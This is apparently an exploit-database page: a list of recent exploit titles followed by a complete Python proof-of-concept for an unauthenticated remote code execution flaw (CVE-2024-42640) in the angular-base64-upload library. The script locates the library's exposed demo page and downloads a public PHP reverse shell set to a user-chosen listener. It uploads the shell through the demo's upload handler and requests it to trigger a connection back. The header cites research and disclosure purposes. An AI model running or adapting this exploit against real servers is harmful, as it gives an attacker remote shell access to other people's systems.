
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command 
Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
# Date: 10 October 2024
# Discovered by: Ravindu Wickramasinghe | rvz (@rvizx9)
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
# Software Link: https://github.com/adonespitogo/angular-base64-upload
# Version: 0.1.20 and earlier (prior to v0.1.21)
# Tested on: Arch Linux
# CVE: CVE-2024-42640
# Severity: Critical - 10.0 (CVSS 4.0)
# Github Link: https://github.com/rvizx/CVE-2024-42640
# Blog Post: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html

# DISCLAIMER:

# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.
# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.
# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.
# Any actions taken with this code are undertaken at the sole discretion and risk of the user.
# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.
# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.
# By using this code, you agree to assume all responsibility and liability for your actions.
# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.
# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.
# Proceed with caution and use this code responsibly.

#!/bin/python3
import re
import subprocess
import requests
import sys
import os
import uuid
import base64
def banner():
    """Print the tool's ANSI-styled banner to stdout.

    The literal is printed verbatim: ``\\033[2m`` dims the terminal text and
    ``\\033[0m`` resets it; the leading and trailing blank lines are part of
    the output.
    """
    text = '''

\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
https://github.com/rvizx/\033[0mCVE-2024-42640

'''
    print(text)
def enum(url: str) -> None:
    """Locate the library's shipped demo page under the target and hand off to exploit().

    Two common front-end dependency install paths are probed with HEAD
    requests, ``bower_components/`` first and ``node_modules/`` second, for
    ``angular-base64-upload/demo/index.html``. The exposure this PoC relies on
    is the library's *demo* directory being served from the web root; when
    neither path answers 200 the script prints guidance and exits.

    Args:
        url: Base URL of the target, up to (not including) the dependency
            install directory.

    Side effects: HEAD/GET requests to the target, output to stdout, and
    ``exit()`` when the demo page is not found. Detection note: requests for
    ``*/angular-base64-upload/demo/index.html`` followed by
    ``*/angular-base64-upload/CHANGELOG.md`` are this script's probe signature.
    """
    print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ")
    target = f"{url}/bower_components/angular-base64-upload/demo/index.html"
    r = requests.head(target)
    if r.status_code == 200:
        print("\033[94m[inf]:\033[0m target is using bower_components")
    else:
        print("\033[94m[inf]:\033[0m target is not using bower_components")
        # Fall back to the npm layout; only these two layouts are tried.
        target = f"{url}/node_modules/angular-base64-upload/demo/index.html"
        r = requests.head(target)
        if r.status_code == 200:
            print("\033[94m[inf]:\033[0m target is using node_modules")
        else:
            print("\033[94m[inf]:\033[0m target is not using node_modules")
            print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html")
            print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
            print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
            print("\033[91m[err]:\033[0m exiting..")
            exit()

    # Best-effort version fingerprint: the first CHANGELOG.md line containing
    # 'v0', or None when absent. The response status is not checked, so a
    # 404 body can yield a misleading value; it is informational only and
    # does not gate the next step.
    version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None)
    print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version)
    # `target` is the demo/index.html URL; exploit() derives server.php from it.
    exploit(target)
def exploit(target: str) -> None:
    """Upload a PHP reverse shell through the demo's server.php and then request it.

    ``target`` is the ``demo/index.html`` URL found by enum(); the upload
    handler URL (``server.php``) and the stored-file URL (``uploads/<name>``)
    are derived from it by string replacement. The upload body is JSON with a
    base64-encoded file and a caller-supplied filename; the demo handler
    presumably writes that name unchanged under ``uploads/``, which is the
    weakness this PoC depends on (fixed upstream in v0.1.21 per the header).

    Args:
        target: URL of ``angular-base64-upload/demo/index.html`` on the target.

    Side effects: interactive prompts on stdin; a GET to GitHub for the
    pentestmonkey shell; a ``<uuid>.php`` file written to the current
    directory and left there afterwards; POST/GET requests to the target; and
    ``exit()`` when the shell download fails.
    """
    print(f"[dbg]: {target}")
    target_server_url = target.replace("index.html","server.php")
    print(f"[dbg]: {target_server_url}")
    payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
    print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
    ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
    port = input("\033[93m[ins]:\033[0m enter listenter port: ")
    print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
    input("\033[93m[ins]:\033[0m press enter to continue...")
    print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
    # The payload is fetched from a third-party repository at run time, so
    # the script's behaviour depends on whatever that file contains at the
    # time of the run; nothing is verified beyond the HTTP status.
    response = requests.get(payload_url)
    if response.status_code == 200:
        # Plain substring replacement of the upstream defaults; the user's
        # input is not validated.
        php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
        payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name
        with open(payload_name, "w") as file:
            file.write(php_code)
    else:
        print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
        print("\033[91m[err]:\033[0m exiting..")
        exit()

    # Re-read the file just written so the uploaded bytes are exactly what
    # was saved to disk.
    with open(payload_name, 'rb') as file:
        file_content = file.read()
        base64_payload = base64.b64encode(file_content).decode('utf-8')

    headers = {
        'Content-Type': 'application/json',
    }

    # JSON shape the demo's server.php expects: base64 content plus filename.
    json_data = {
        'base64': base64_payload,
        'filename': payload_name,
    }

    # NOTE(review): TLS verification is disabled only for this POST; the HEAD
    # and GET calls elsewhere in the script use requests' default verification.
    response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
    print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
    updemo_endpoint = f"uploads/{payload_name}"
    print(f"[dbg]: {updemo_endpoint}")
    payload_url = target_server_url.replace("server.php",updemo_endpoint)
    print(f"[dbg]: {payload_url}")
    if response.status_code == 200:
        print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}")
        print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
        # A 200 here only shows the stored file was served; whether it ran is
        # only observable at the listener.
        r = requests.get(payload_url)

        if r.status_code == 200:
            print("\033[94m[inf]:\033[0m process complete!")
        else:
            print("\033[91m[err]:\033[0m something went wrong!")

    print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
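if __name__ == "__main__":
    # Entry point: print the banner, validate the single positional argument
    # and run the enumeration step, which chains into exploit().
    banner()
    # The argument count is checked explicitly. The previous bare `except:`
    # caught every failure (missing argument, network errors, Ctrl-C) and
    # reported all of them as a usage error, hiding the real cause.
    if len(sys.argv) != 2:
        print("[usg]: ./exploit.py <target-url>")
        exit()
    url = sys.argv[1]
    print(f"\033[94m[inf]:\033[0m target: {url}")
    try:
        enum(url)
    except KeyboardInterrupt:
        # Ctrl-C during the interactive prompts or a request is a normal
        # abort, not a usage error; anything else propagates with a traceback.
        print("\033[91m[err]:\033[0m interrupted, exiting..")
        exit()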